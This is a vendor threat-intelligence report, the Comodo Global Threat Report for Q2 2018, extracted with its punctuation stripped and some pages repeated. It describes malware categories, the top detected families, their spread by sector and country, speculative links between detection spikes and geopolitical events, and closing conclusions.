Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
